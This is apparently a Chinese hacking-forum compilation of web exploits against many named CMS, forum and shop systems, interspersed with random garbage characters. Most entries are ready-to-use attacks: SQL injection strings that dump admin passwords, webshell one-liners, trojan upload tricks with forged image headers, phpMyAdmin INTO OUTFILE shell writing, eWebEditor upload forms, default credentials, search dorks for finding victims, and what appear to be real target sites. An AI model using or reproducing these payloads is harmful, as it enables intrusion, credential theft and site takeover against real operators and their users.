启航企业建站系统 cookie注入漏洞通杀所有版本
) D) w2 `; i% ~0 y! a& j
( i. G- R- ?- r6 ^直接上exploit:
2 p: D' i j N) a1 e Qjavascript:alert(document.cookie="id="+escape("1 and 1=2 union select 1,username,password,4,5,6,7,8,9,10 from admin"));) _7 M1 K' n5 L' x& s1 P- m2 K7 p
test:http://www.tb11.net/system/xitong/shownews.asp?id=210- {" s6 d# I& r! F9 O
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------! i' y3 n |: f# `0 K$ M9 _4 E
Asprain论坛 注册用户 上传图片就可拿到webshell4 m |1 N$ ]: h0 u7 L7 L8 ~( z
' c4 @0 h: Z4 V# DAsprain是一个适合于各中小学、中专、技校、职高建设校园论坛、师生交流论坛,一些教科研部门、公司企业建设内部论坛、IT技术爱好者建设技术交流论坛的免费论坛程序。
$ t/ G; T' O2 i; G {% I+ Y, X1.txt存放你的一句话马 如:<%execute(request("cmd"))%>& h7 r4 ]0 w; r O5 `/ k
2.gif 为一小图片文件,一定要小,比如qq表情图片: t& [# j6 y$ m: c$ Q0 B- J
3:copy /b 2.gif+1.txt 3.gif 这样就伪造了文件头,但是现在传上去还不行,我接下来就用. w* a( {3 o6 t+ @2 Z& `
4:copy /b 3.gif+2.gif 4.asp ok,现在文件头和文件尾都是正常的图片文件了
6 R8 N4 Q4 i `5.q.asp;.gif
) w B3 v" `6 U' X; i9 @% D# u0 ugoogle:Powered by Asprain
1 M5 x4 F. D1 w- h9 b7 N4 r, ?--------------------------------------------------------------------------------------------------------------------------------------------------------------------------
3 y% X/ v$ Y' H2 \# `$ `% E
8 b: f0 O3 l' j1 g. xShopNum1全部系统存在上传漏洞。
2 h0 h% H& s# W0 P7 v( U- @, k# t
8 V$ C: k/ q- J9 m0 B, v& Y: M首先 在 http://www.shopnum1.com/product.html 页面查看任意产品详细说明。+ S4 K) @- y- [: W
按说明 提示登录后台。。! u7 j, k! G% j' q8 ^/ p
在后台功能页面->附件管理->附件列表
: G, m$ K6 Y/ F3 ~* d% b6 s可以直接上传.aspx 后缀木马
) ]5 b9 W) j/ ~8 M) Shttp://demo.shopnum1.com/upload/20110720083822500.aspx
5 i: j. B( \1 {* _. H--------------------------------------------------------------------------------------------------------------------------------------------------------------------------
1 J+ J) {! f9 W# ]7 E" \
/ ], i1 ]8 h6 P- g. W- o牛牛CMS中小企业网站管理系统 上传漏洞
; a! p6 b a1 L; Q5 ~9 s
1 H" m: t& W7 i9 y3 K' B牛牛CMS是中企商铺网专为中小企业网站开发的网站管理系统。
% M) q+ A P- O( K后台:admin/login.asp3 H1 t4 M" \. M& l' l3 b
ewebeditor 5.5 Nday% n& L. h" W/ {% f
exp:
6 I7 `$ W; }" s5 T3 @<form?action="http://www.lz5188.net/Admin/WebEditor168/asp/upload.asp?action=save&type=image&style=popup&cusdir=Mr.DzY.asp"?method=post?name=myform?enctype="multipart/form-data">?
! E" l c2 s# V: y<input?type=file?name=uploadfile?size=100><br><br>?
3 _( k. w3 `$ }$ g1 d: K' G3 `4 w<input?type=submit?value=upload>?( `$ b# P: {5 J* [2 X9 W& a# I( p- N
</form># ]9 R* T; \. L/ b+ Z; J% o
ps:先上传小马.
4 ?1 A$ k8 I3 @& e1 C- w; [inurl:member/Register.asp 您好,欢迎来到立即注册立即登录设为首页加入收藏2 u, [8 `" v* T( }
3 Y Y. T! r& V, k+ M6 M4 i--------------------------------------------------------------------------------------------------------------------------------------------------------------------------
8 I; i2 S" M7 ]1 o5 _: q
) A' F0 q" B B9 i" w" ]YothCMS 遍历目录漏洞
! J: I: F" w! h; Q& N# t& n9 m( O
优斯科技企业网站管理系统(YothCMS)是一款完全开源免费的CMS。: Q( g* j" W: S
默认后台:admin/login.asp
6 F3 s6 J7 @- P3 V, M; A遍历目录:
- G0 i6 [; n, |) [% x8 i0 _) aewebeditor/manage/upload.asp?id=1&dir=../6 d* D9 Q8 f. Q4 s% b( [( c
data:& ^# j+ I3 |8 l+ W3 e
http://www.flycn.net/%23da%23ta%23\%23db_%23data%23%23.asa
7 {+ U+ y8 A! B! w, E- O--------------------------------------------------------------------------------------------------------------------------------------------------------------------------
1 Q7 n4 _1 p7 w
$ V; S# d. c# v+ A1 f' D9 W" vNet112企业建站系统 1.0
; E& I( f! n! P: n- `8 x' A* ^9 c/ b3 t1 l$ e. A! v$ @$ E
源码简介:
+ t6 ~- J# B5 g1 [. K$ V' q1 zNet112企业建站系统,共有:新闻模块,产品模块,案例模块,下载模块,相册模块,招聘模块,自定义模块,友情链接模块 八大模块。
4 \4 ^6 g n6 m& Z4 x添加管理员:! a& k, b1 s1 U% |& W/ d7 u# s
http://www.0855.tv/admin/admin.asp?action=add&level=2
S: r" M, r- q; | P其实加不加都不是很重要,后台文件都没怎么作验证。; E" `& s( C$ U
上传路径:
* W, i% B, Z8 Phttp://www.0855.tv/inc/Upfile.as ... 0&ImgHeight=2008 O5 W$ X1 L$ ^' _" f9 X7 V" u
http://www.0855.tv/inc/Upfile.asp?Stype=2! C8 U* F2 l% H6 A
怎么利用自己研究。
5 A, @; q/ E4 `- x& t6 S5 n; z遍历目录:$ M7 X- \) a- A9 k$ O' {
http://www.0855.tv/admin/upfile.asp?path=../..
' p- k C* S9 ]. D' ^) J如:
. H% Z6 a- Y% V% _1 z5 Fhttp://www.0855.tv/admin/upfile.asp?path=../admin
& o: e+ m! |: j6 I2 e: J2 Ohttp://www.0855.tv/admin/upfile.asp?path=../data
; `$ E( n" F* |/ Y% Z- ~--------------------------------------------------------------------------------------------------------------------------------------------------------------------------
6 G* M8 [! ?3 i/ X; m: ~3 z n2 F7 `) L9 C2 R2 r
易和阳光购物商城通杀 上传漏洞
: o3 f/ y8 N+ Z1 `# o0 R' i; E( Y3 N: q* O3 |5 p
前提要求是IIS6.0+asp坏境。
$ _8 u6 @+ n6 C% }2 b漏洞文件Iheeo_upfile.asp
' Z! }; a( l: q- a过滤不严.直接可以iis6.0上传
& Z8 E6 G1 y0 o, m3 C9 a, U把ASP木马改成0855.asp;1.gif& ?# O# @: t; O }. |
直接放到明小子上传" }+ ]( X6 `8 M+ }1 T
Google搜索:inurl:product.asp?Iheeoid=1 L$ T( w9 E: a; P4 @% I6 P
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------7 `" [! |7 E, e* c/ f& X8 V
) D2 e, X3 R% o% N* q% n+ @" Z! H
phpmyadmin后台4种拿shell方法
6 f2 {3 M' ?9 |7 F+ L+ J# B* Z: G6 g! i
0 v( F/ S! ]4 _- _! x( _' A" p' o, k8 ^方法一:
6 J" T8 i6 j' m% u. @! MCREATE TABLE `mysql`.`xiaoma` (`xiaoma1` TEXT NOT NULL );
' j# Y2 D4 t2 u" O8 N: l+ e" Y- yINSERT INTO `mysql`.`xiaoma` (`xiaoma1` )VALUES ('<?php @eval($_POST[xiaoma])?>');7 `% I" o, ~/ q: O3 `/ N& s8 E
SELECT xiaomaFROM study INTO OUTFILE 'E:/wamp/www/7.php';
3 P: U/ q* V. r+ S+ q! N9 D- s# k- g----以上同时执行,在数据库: mysql 下创建一个表名为:xiaoma,字段为xiaoma1,导出到E:/wamp/www/7.php9 c7 o2 ?, l1 m4 B0 z
一句话连接密码:xiaoma
4 G; d# J7 o# k9 J, R% N; c方法二:
- ^1 x$ c/ ], C) |. nCreate TABLE xiaoma (xiaoma1 text NOT NULL);
1 {, W& `) f- RInsert INTO xiaoma (xiaoma1) VALUES('<?php eval($_POST[xiaoma])?>');# N* b9 D* y2 C/ }& J
select xiaoma1 from xiaoma into outfile 'E:/wamp/www/7.php';+ A" @. e5 j7 m+ ^1 N
Drop TABLE IF EXISTS xiaoma;( |& m% _' `. O4 s: m6 H5 c2 P
方法三:1 o" T7 b+ \* \1 n
读取文件内容: select load_file('E:/xamp/www/s.php');6 |4 ?3 j. b( H( I
写一句话:select '<?php @eval($_POST[cmd])?>'INTO OUTFILE 'E:/xamp/www/xiaoma.php'
* e2 F- s+ D g" @7 X4 c8 U1 fcmd执行权限:select '<?php echo \'<pre>\';system($_GET[\'cmd\']); echo \'</pre>\'; ?>' INTO OUTFILE 'E:/xamp/www/xiaoma.php'/ U5 d5 i8 S# g* d8 l# s3 E* q
方法四:# J1 u. s) o3 s' |3 ^ }
select load_file('E:/xamp/www/xiaoma.php');
2 r/ t, m2 m6 b4 A3 {select '<?php echo \'<pre>\';system($_GET[\'cmd\']); echo \'</pre>\'; ?>' INTO OUTFILE 'E:/xamp/www/xiaoma.php'
4 e8 ~! t' o4 E然后访问网站目录:http://www.xxxx.com/xiaoma.php?cmd=dir. i" v, K; d9 c, R" T
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------
0 z- ^2 z- v. o K# y
$ S; N; C& o: b6 m传信网络独立开发网站源码0day漏洞
: F" E, E7 t: x$ P, T2 n- v# J
+ G; A. M: A. F2 h' s3 q后台system/login.asp% z6 G3 b( \" C: Q* t0 D
进了后台有个ewebeditor
# f; Z$ S0 t6 k ?Google 搜索inurl:product1.asp?tyc=% s: O& n' E& Z4 P& m" |
编辑器漏洞默认后台ubbcode/admin_login.asp; ^% |: @& b2 l: G+ L5 X6 f
数据库ubbcode/db/ewebeditor.mdb
$ u1 T& x4 w" c; Z+ z& s4 @默认账号密码yzm 111111+ ?0 o8 I7 ~; C, v
+ h7 ?* K& r8 B2 S* l6 \1 \
拿webshell方法1 o) H: N5 p+ f5 {/ V
登陆后台点击“样式管理”-选择新增样式 ( g7 N% `6 ~" i8 s4 _
样式名称:scriptkiddies 随便写
O) ]* b6 y- g# M6 U路径模式:选择绝对路径 ' R6 ]; W ]8 ~' Y
图片类型:gif|jpg|jpeg|bmpasp|asa|aaspsp|cer|cdx
# Q, A4 Q. E3 L+ q& @& i7 ]图片类型比如就是我们要上传的ASP木马格式
6 o3 E0 |$ T0 U% D9 F上传路径:/$ {, a9 Z! R q. | a% L: W
图片限制:写上1000 免的上不了我们的asp木马
7 g5 }2 J; n" S7 c4 I" T& N上传内容不要写) \, ]2 l9 C* j2 s
可以提交了
0 l7 R* f9 m# z/ `. ^样式增加成功! % T$ m0 x: p8 w
返回样式管理 找到刚才添加的样式名称 然后按工具栏 在按新增工具栏
3 @+ g6 I$ {+ _- U# }/ r* {按钮设置 在可选按钮 选择插入图片然后按》 -然后保存设置0 g1 r1 O( D7 N7 i" X
网页地址栏直接输入ubbcode/Upload.asp?action=save&type=&style=scriptkiddies1 `1 ]: U' B4 G& V
上ASP木马 回车 等到路径
/ a0 P+ h2 T* Y2 T. D
2 P2 w/ x+ D3 }5 P r后台:system/login.asp% _# Q( `/ P$ X6 h
Exp:8 g V( K& s7 n5 z1 H
and 1=2 union select 1,userid,3,4,5,6,7,8,userpwd,10,11,12,13,14,15 from master- G) _& A& E* a- g5 v
测试:
: t9 z9 ~+ X, a+ H+ }http://www.zjgaoneng.com/product_show.asp?id=9 and 1=2 union select 1,userid,3,4,5,6,7,8,userpwd,10,11,12,13,14,15 from master
8 J) e5 m5 b5 R- Mhttp://www.yaerli.com/product_show.asp?id=245 union select 1,userid,3,4,5,6,7,8,userpwd,10,11,12,13,14 from master
' ^ W2 b. F% E5 F- b--------------------------------------------------------------------------------------------------------------------------------------------------------------------------
/ i9 _, g, j# [ M6 _6 s b8 W* R/ N9 ]# x8 Y
foosun 0day 最新注入漏洞
7 K0 Q( y" a, {' a6 R
" h; {& _ D* h漏洞文件:www.xxx.com/user/SetNextOptions.asp+ O, T' j5 N b& R4 V* T
利用简单的方法:- \" M8 N0 K9 K7 ^/ E
暴管理员帐号:; j: e, s% _( K$ \' A7 X
http://www.i0day.com/user/SetNex ... amp;ReqSql=select+1,admin_name,3,4,5,6,7,8++from+FS_MF_Admin
! g1 N* Q- Y. S3 E( e暴管理员密码:1 ^) r, H1 U6 I4 \4 W
http://www.i0day.com/user/SetNex ... amp;ReqSql=select+1,admin_pass_word,& D5 R/ I* j1 f
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------
! ^+ n h* T. ~% g
; p5 b% D9 k4 d" C: i% g+ f0 e网站程序的版权未知!
- W6 O0 U$ d3 x7 R4 V5 T- B6 y
- E! ?& B( T+ y9 R9 }8 F默认网站数据库:/ \0 q0 X0 z8 E
www.i0day.com/data/nxnews.mdb
8 {( w/ w U, _# Oewebeditor 在线编辑器:6 |8 ?9 [( r$ X# S5 U
编辑器数据库下载地址:www.i0day.com/ewebeditor/db/ewebeditor.mdb7 n( U9 p Z8 ^, B/ Y" x3 v
登录地址:ewebeditor/admin_login.asp' _! W3 s, P) t* n/ i
默认密码:admin admin
v7 ?8 ^; m' W6 L' G/ G. O5 ^登陆后可遍历目录:ewebedtior/admin_uploadfile.asp?id=22&dir=../../data3 h+ X+ G- H5 L& `
* y6 f% N4 I3 l7 ] @: [) Y5 Q
Sql注入漏洞:) }9 {& k! m' W, Q1 m" Y4 T
http://www.i0day.com/detail.asp?id=12
6 @8 s, ?) `8 Fexp:, F3 y4 s: n9 R
union select 1,admin,password,4,5,6,7,8 from admin- S) P* V3 g, `/ Z$ `
爆出明文帐号/密码0 j. K) s1 L0 g$ P/ K; T
Z# V0 D' j$ ~; N
上传漏洞:: ~9 q+ U" r9 M; r0 Z
后台+upfile.asp
8 @9 ]* t2 Q& K* c; C D5 G如:& `5 Q+ O& e! d
http://www.i0day.com/manage/upfile.asp 可以用工具。如明小子。
9 ~ H3 Q( ~, fshell的地址:网址+后台+成功上传的马) Y- E" n4 ~3 ]2 I G1 L) q
google:inurl:news.asp?lanmuName=
& Y' a2 q2 N+ u! n------------------------------------------------------------------------------------------------------------------------------------------------------------------------
# }. ]' Z' c( Y$ B4 u! m7 t" {
+ Z( G2 }3 t& g- `" Mdedecms最新0day利用不进后台直接拿WEBSHELL# c4 ?! b( Q6 ?9 D% `3 d
/ \6 O! k; z8 Z' {5 d8 f" P1 i拿webshell的方法如下:+ m- o* @& z" ?8 o* a
网传的都是说要知道后台才能利用,但不用,只要 plus 目录存在,服务器能外连,就能拿shell.
* h3 j0 q8 ]0 y* l c5 n9 q4 r前题条件,必须准备好自己的dede数据库,然后插入数据:
+ N' Z) E" }( _/ p5 qinsert into dede_mytag(aid,normbody) values(1,'{dede:php}$fp = @fopen("1.php", \'a\');@fwrite($fp, \'\');echo "OK";@fclose($fp);{/dede:php}');
6 B6 g, M) e$ x0 x! `7 K( E9 J, @" F9 P9 s! a4 G, a+ d6 @
再用下面表单提交,shell 就在同目录下 1.php。原理自己研究。。。
0 P7 P1 m( b; w; ?" ~2 `5 q<form action="" method="post" name="QuickSearch" id="QuickSearch" onsubmit="addaction();">
0 G% r% K& O! c6 o/ B6 D<input type="text" value="http://www.tmdsb.com/plus/mytag_js.php?aid=1" name="doaction" style="width:400"><br />& O; |! Z0 m, R
<input type="text" value="dbhost" name="_COOKIE[GLOBALS][cfg_dbhost]" style="width:400"><br />
# v7 a. ~6 \: _: i<input type="text" value="dbuser" name="_COOKIE[GLOBALS][cfg_dbuser]" style="width:400"><br />
- ~/ H1 U- t/ |( [+ K: H<input type="text" value="dbpwd" name="_COOKIE[GLOBALS][cfg_dbpwd]" style="width:400"><br />
: D& P) \+ p& p1 w5 a8 A& H<input type="text" value="dbname" name="_COOKIE[GLOBALS][cfg_dbname]" style="width:400"><br />/ c5 K' B( m. ?3 E3 |# ]. B
<input type="text" value="dede_" name="_COOKIE[GLOBALS][cfg_dbprefix]" style="width:400"><br />
# _- E( ?* |( v0 O9 { i( R$ E: |5 B<input type="text" value="true" name="nocache" style="width:400">
+ S1 ~/ E9 j% Y, m7 N4 [$ ^ T) X<input type="submit" value="提交" name="QuickSearchBtn"><br />* [ d' y' h) [- W, R
</form>
3 J7 L4 H7 o0 V) r1 z8 _+ Z/ g<script>
4 x$ P& @) A b* K1 Q! dfunction addaction()
# a! b9 z7 z2 i W* v& F{
3 i x9 R8 @7 d1 u' Ndocument.QuickSearch.action=document.QuickSearch.doaction.value;! T: N6 G; i1 S5 ^+ J/ f5 \
}
+ b( u# z" l; s5 ^0 u0 d</script>
) w0 Q2 w9 c0 x8 i* J' ^-----------------------------------------------------------------------------------------------------------------------------------------------
/ W9 O4 O% G$ U% q% @8 m' G7 S; t& U# _4 m" [& a4 }& G
dedecms织梦暴最新严重0day漏洞
3 Z2 ~" O7 e8 n }/ tbug被利用步骤如下:
! w' o' v+ t$ k+ m" M9 Uhttp://www.2cto.com /网站后台/login.php?dopost=login&validate={dcug}&userid=admin&pwd=inimda&_POST[GLOBALS][cfg_dbhost]=116.255.183.90&_POST[GLOBALS][cfg_dbuser]=root&_POST[GLOBALS][cfg_dbpwd]=r0t0&_POST[GLOBALS][cfg_dbname]=root
2 P* [; @$ X; |9 v把上面{}上的字母改为当前的验证码,即可直接进入网站后台。* ^( N. s, x# W5 F% I- r, V. L; d
-------------------------------------------------------------------------------------------------------------------------------------------
: r% @* z% a4 F; [- L; ^) J0 b- e. b- x# k" O4 d) r
多多淘宝客程序上传漏洞 ( J5 i% M% h) G
漏洞页面:. v8 P+ W# D$ l% p9 \
admin\upload_pic.php4 C5 W" I" z( F; J1 a
传送门:+ \! m, \/ b& d
http://www.www.com/admin/upload_pic.php?uploadtext=slide15 T) X* P8 L% J) y" M
PS:copy张图片马 直接 xxx.php 上传抓包地址!
R/ u/ [7 y3 R U5 O y2 }/ J; f------------------------------------------------------------------------------------------------------------------------------------------------------( k2 t, Q- C! ^9 R8 z
# Q% D; ?, e4 [3 z无忧公司系统ASP专业版后台上传漏洞2 \: c; e: j7 n0 e: L
漏洞文件 后台上传
2 ]2 A, c: P' ladmin/uploadPic.asp
6 s5 D3 \! W/ @& }漏洞利用 这个漏洞好像是雷池的
5 m% q% {8 _/ u5 D y3 U3 I7 Ehttp://forum.huc08.com/admin/upl ... ptkiddies.asp;& upload_code=ok&editImageNum=1* J4 g. R4 ~9 d1 c6 o
等到的webshell路径:! T+ I! g. N5 k
/UploadFiles/scriptkiddies.asp;_2.gif
) ^7 I# N) L* o8 b6 T---------------------------------------------------------------------------------------------------------------------------------------------------
% x* }( X) H4 R3 @+ R
; Z' {8 c u' I; M2 n+ v1 [住哪酒店分销联盟系统2010/ f' i6 X$ i/ @
Search: l# w1 q7 B3 {
inurl:index.php?m=hotelinfo
8 D- f% `+ Z M; Q3 x- Ghttp://forum.huc08.com /index.php?m=liansuohotel&cityid=53%20and%201=2%20union%20select%201,concat(username,0x3a,password),3,4,5,6,7,8,9,10%20from%20zhuna_admin( M4 d; d+ P+ N1 \$ g0 I3 p
默认后台:index.php?m=admin/login
( N+ |2 o3 P, n" U8 j- S--------------------------------------------------------------------------------------------------------------------------------------------------6 j6 i' Y, k* A! N& y0 d
3 P0 J! k2 g+ H" H" Y" Qinurl:info_Print.asp?ArticleID=; g0 _$ w. |3 r# q1 h; d9 J9 n( q
后台 ad_login.asp. r9 S6 x( g$ r- U3 l' L. b N- U
爆管理员密码:
3 L* q3 y9 I) z6 ~union select 1,2,username,password,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28 from admin( s) S) R2 B' z8 J
------------------------------------------------------------------------------------------------------------------------------------------------------------5 Z! S. ^' i' L
+ h9 B# W1 c8 T! N: w7 s$ k) S* q4 U搜索框漏洞!# q5 y$ V0 @7 E9 M) {
%' and 1=2 union select 1,admin,3,4,5,6,password,8,9,10 from admin where '%'='- q6 S- F9 ~5 O8 B
--------------------------------------------------------------------------------------------------------------------------------------------------------5 E* Y |6 ?& o5 I5 ]2 x
8 X7 c9 w9 O4 e
关键字:2 L+ i7 w8 e" d+ |- C8 B& R2 O* c
inurl:/reg_TemletSel.asp?step=2
! g6 E% E9 z. t或者
* z8 _4 b& e3 A8 w' ?电子商务自助建站--您理想的助手
& r# ~3 f7 u' y/ S-------------------------------------------------------------------------------------------------------------------------------------------------
W& l0 M9 l' Z C! g( r. I6 p9 W$ H8 E; L9 H
iGiveTest 2.1.0注入漏洞; m$ ?+ l, m' x Y' I
Version: <= 2.1.0
' l0 z+ |0 [! y# x4 |! P+ O# Homepage: http://iGiveTest.com/
/ Z: R3 e* D$ \% L谷歌关键字: “Powered by iGiveTest”1 a1 I: ^4 q$ g1 V( v, F
随便注册一个帐号。然后暴管理员帐号和密码7 v8 k! x* r: s) W: Z1 b
http://www.xxxx.com/users.php?ac ... r=-1&userids=-1) union select 1,concat(user_name,0x3a,user_passhash),user_email,user_firstname,user_lastname,6,7 from users,groups where (1- d$ }6 z' r. ^
------------------------------------------------------------------------------------------------------------------------------------------------5 d$ L' C/ H8 F3 Q0 W9 X
) j; n0 V" T: a2 J1 b1 h7 iCKXP网上书店注入漏洞
( Q9 {# @" j, G* R: I工具加表:shop_admin 加字段:admin
% t+ H2 e) f, e7 b后台:admin/login.asp
$ G6 ^% Q3 V- b1 w+ x+ {4 k0 K登陆后访问:admin/editfile.asp?act= 直接写马.也可以直接传马:admin/upfile1.asp?path=/, U! [# L5 c! r. f) d: d- O4 d$ q2 e
inurl:book.asp 请使用域名访问本站并不代表我们赞同或者支持读者的观点。我们的立场仅限于传播更多读者感兴趣的信息! r+ l, h0 s2 W* X( }4 r
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------/ @+ R- B9 R# t5 T6 {
Z( S$ ^9 [& P
段富超个人网站系统留言本写马漏洞
. C- a7 X6 R' h" e源码下载:http://www.mycodes.net/24/2149.htm! `" ?. b2 h2 S! V. R+ H. h# v
addgbook.asp 提交一句话。) }! N( g# x' _: }2 D
连接: http://www.xxxx.tv/date/date3f.asp! z/ T( @. [! ^
google:为防批量,特略!
7 {, b: \: l9 t d0 T-------------------------------------------------------------------------------------------------------------------------------------------------------------------------
1 t' W- i+ l, l4 O3 b
0 h" \( N4 E& M5 q& q8 T; V智有道专业旅游系统v1.0 注入及列目录漏洞" w1 K% K: t9 D1 a! m, l
默认后台路径:/admin/login.asp' `: u ?! t; [) S/ l
默认管理员:admin
q1 K3 Q) J* G$ _默认密码:123456
" P3 \, L3 D3 T1 q! w; Z# \% Y$ wSQL EXP Tset:: T3 U7 ^2 F2 Y; d5 k; ]
http://www.untnt.com/info/show.asp?id=90 union select 1,userid,3,4,5,userpsw,7,8,9,10,11,12,13,14,15 from admin
/ y2 w! [% Q9 i; S# r------------------------------------------------------------------------------------------------------------------------------------------------------------------------
$ k" {* g% J9 z' T; f
( f9 w) e9 i1 F8 qewebeditor(PHP) Ver 3.8 本任意文件上传0day
& G0 ?( B- |0 p7 PEXP:+ p7 a& C$ P7 M# k
<title>eWebeditoR3.8 for php任意文件上EXP</title>
. C* s& Y( N' p: L) _<form action="" method=post enctype="multip
' Q1 `* N4 q- Z# O9 F( U+ t' d: qart/form-data">
* u n: K9 Z2 K6 u9 e<INPUT TYPE="hidden" name="MAX_FILE_SIZE" value="512000"> & M+ `4 A. ~1 k) z
URL:<input type=text name=url value="http://www.untnt.com/ewebeditor/" size=100><br>
X$ Y1 Q& M P! n: t<INPUT TYPE="hidden" name="aStyle[12]" value="toby57|||gray|||red|||../uploadfile/|||550|||350|||php|||swf|||gif|jpg|jpeg|bmp|||rm|mp3|wav|mid|midi|ra|avi|mpg|mpeg|asf|asx|wma|mov|||gif|jpg|jpeg|bmp|||500|||100|||100|||100|||100|||1|||1|||EDIT|||1|||0|||0|||||||||1|||0|||Office|||1|||zh-cn|||0|||500|||300|||0|||...|||FF0000|||12|||宋体||||||0|||jpg|jpeg|||300|||FFFFFF|||1"> ! ^ _& i* H1 q( ?9 V
file:<input type=file name="uploadfile"><br> % N2 i3 X: S1 S' }
<input type=button value=submit onclick=fsubmit()> 4 E7 g2 F* b$ }$ q9 K# w l
</form><br> % J# j3 i& L- n( e. g( {5 t
<script> ' k, c! Y* \" j; {+ F
function fsubmit(){ + K p: l. A5 [1 Y. r5 G; o
form = document.forms[0];
5 N# V# }: D7 Jform.action = form.url.value+''php/upload.php?action=save&type=FILE&style=toby57&language=en'';
1 S3 S7 f5 V2 C0 S; Q! qalert(form.action); 1 Z4 z, v* q' B) ~
form.submit(); : A* R: V' K7 D) L' X% D. I8 H7 D
}
3 D$ B7 Y" h2 A) n/ y7 B/ ~</script>/ G6 I2 g: @3 t7 @. r2 d- r
注意修改里面ewebeditor的名称还有路径。
" ?* ^; Y6 X2 C3 c" i---------------------------------------------------------------------------------------------------------------------------------------------------------------------------6 W2 U" e1 l5 A
" k ?# ?# a. Q) a' S, y$ ]提交’时提示ip被记录 防注入系统的利用
) L1 }& D% Z& \+ N. `1 T8 _. j6 x6 X网址:http://www.xxx.com/newslist.asp?id=122′# g7 k) U) O- p, j$ q/ M: t
提示“你的操作已被记录!”等信息。
9 M$ w6 p2 m$ x+ ^利用方法:www.xxx.com/sqlin.asp看是否存在,存在提交http://www.xxx.com/newslist.asp?id=122‘excute(request("TNT"))写入一句话。
1 p- D& D) N% w! [" O7 C" \-----------------------------------------------------------------------------------------------------------------------------------------------------------------------------
4 P( G6 T3 ~3 B& w7 Q K7 e$ U/ A0 D) v- U" @% Z. {/ k
西部商务网站管理系统 批量拿shell-0day
6 U" e6 r, u3 M4 ^/ l这站用的是SQL通用防注入程序 V3.0,恩,这东西可不好绕,我记得当初我有写过一个文章 通过提交一句话直接拿shell的..唯一的前提是存储记录ip的数据库必须是.asp或.asa才行..看了下sqlin.mdb
( S. {6 s0 Y8 v1:admin_upset.asp 这个文件有个设置上传后缀的地方.. 很简单,它直接禁止了asp,asa.aspx 还有个cer可以利用嘛5 P0 X2 X1 m9 M. r7 o
2:同样是admin_upset.asp 这个文件不是入库的 他是直接在htmleditor目录生成个config.asp文件...Ok不用多说,插个一句话搞定...注意闭合
! E3 f }8 m* s. H' j& {3:admin_bakup.asp 备份数据库的..但是得本地构造...调用了filesystemobject 怎么利用就不强调了..IIS的bug大家都懂. I6 M3 L* Y) E0 F5 C2 S" j: S
---------------------------------------------------------------------------------------------------------------------------------------------------------------------------
8 |4 u2 z- e* {8 F5 l5 f' {$ S8 G: a( o- |
JspRun!6.0 论坛管理后台注入漏洞1 @; J" r( j. g& R
# G' C# ~, Q# i% I) `! B0 b
SEBUG-ID:20787 发布时间:2011-04-30 影响版本:6 _! j+ {% [5 H6 D3 R8 _7 n
JspRun!6.0
# g" {7 R# O1 z# W0 b2 |% S) |/ Y5 @漏洞描述:, Z+ `0 ]( y5 J' B# Z& \
JspRun!论坛管理后台的export变量没有过滤,直接进入查询语句,导致进行后台,可以操作数据库,获取系统权限。
. S q6 g. p9 O8 I7 Z在处理后台提交的文件中ForumManageAction.java第1940行
/ ~9 A; H, s1 w! IString export = request.getParameter("export");//直接获取,没有安全过滤
4 J V& M$ d8 n0 uif(export!=null){& b" T5 g) l( ~ D
List> styles=dataBaseService.executeQuery("SELECT s.name, s.templateid, t.name AS tplname, t.directory, t.copyright FROM jrun_styles s LEFT JOIN jrun_templates t ON t.templateid=s.templateid WHERE styleid='"+export+"'");//进入查询语,执行了...
/ D1 d/ V- P( I: ^if(styles==null||styles.size()==0){
2 o$ F* R) `$ R<*参考
1 }5 @7 r' I- K% O! G$ u7 snuanfan@gmail.com
. U, t' l! }' [5 B+ ~; e0 R+ O' Y; S*> SEBUG安全建议:$ m9 |+ R% I. ?$ b& X. B5 V' G
www.jsprun.net1 k, ~2 w& h0 P
(1)安全过滤变量export
/ r) z8 F) J1 k(2)在查询语句中使用占位符+ j, }! b6 s$ F ?8 s! i9 h
------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
4 e8 l6 y7 a! e- a2 m
4 D: ^# ]/ Q/ Q乌邦图企业网站系统 cookies 注入( _. W M3 b" r; ]
. Z- G. h- ?7 U$ k/ W& r程序完整登陆后台:/admin/login.asp/ \: D7 o/ X$ }. y3 g( R- S
默认登陆帐号:admin 密码:admin888
4 r$ p9 M& L9 I5 O语句:(前面加个空格)
. q; r z+ ]" _4 eand 1=2 union select 1,username,password,4,5,6,7,8,9,10 from admin- G! o: ]% w; z) i* R1 d
或者是16个字段:
4 V( y/ q& P! c) c" t9 U) ^. Z# Kand 1=2 union select 1,username,password,4,5,6,7,8,9,10,11,12,13,14,15,16 from admin$ l. x0 f5 ~/ k# c0 x" w6 @
爆不出来自己猜字段。
- Q: u7 X8 P( G/ ?! {注入点:http://www.untnt.com/shownews.asp?=88# P0 h5 `& Y7 o, q5 d9 }5 a
getshell:后台有备份,上传图片小马。备份名:a.asp 访问 xxx.com/databakup/a.asp2 C* l! R7 c: f
关键字:* ]# g# o, ?/ A/ W6 C! c
inurl:shownews?asp.id=
5 o. Z( K7 H! |! ]1 d, g2 m-----------------------------------------------------------------------------------------------------------------------------------------------------------------------------% o1 r$ t9 Q+ t( e- i5 j9 \" V
8 J# p% U2 |0 M% t" f7 ]0 M
CKXP网上书店注入漏洞
' g5 V6 ?* }" Q0 G
% r0 p+ O$ a9 ~工具加表:shop_admin 加字段:admin
, E0 H4 a |" D- V( v后台:admin/login.asp " o1 {# d5 H1 e# u) X
登陆后访问:admin/editfile.asp?act= 直接写马.也可以直接传马:admin/upfile1.asp?path=/
# `+ e6 P& C6 G" C& Linurl:book.asp 请使用域名访问本站并不代表我们赞同或者支持读者的观点。我们的立场仅限于传播更多读者感兴趣的信息
3 a4 r7 G( w7 I4 G/ g t1 @6 ^---------------------------------------------------------------------------------------------------------------------------------------------------------------------------0 H% v4 f5 o5 d1 w( ^, e8 x
3 }6 R$ t& ]7 R; x4 c% O& v
YxShop易想购物商城4.7.1版本任意文件上传漏洞
9 d/ ?$ m" Z, Y+ u# B7 R( S! U$ t9 p" o8 I9 k5 o. x
http://xxoo.com/controls/fckedit ... aspx/connector.aspx6 L8 C3 [5 e4 T% M) \
跳转到网站根目录上传任意文件。5 |; I' |9 b2 w3 w
如果connector.aspx文件被删可用以下exp,copy以下代码另存为html,上传任意文件; q% Y* L, f# ^9 o1 q( u) P
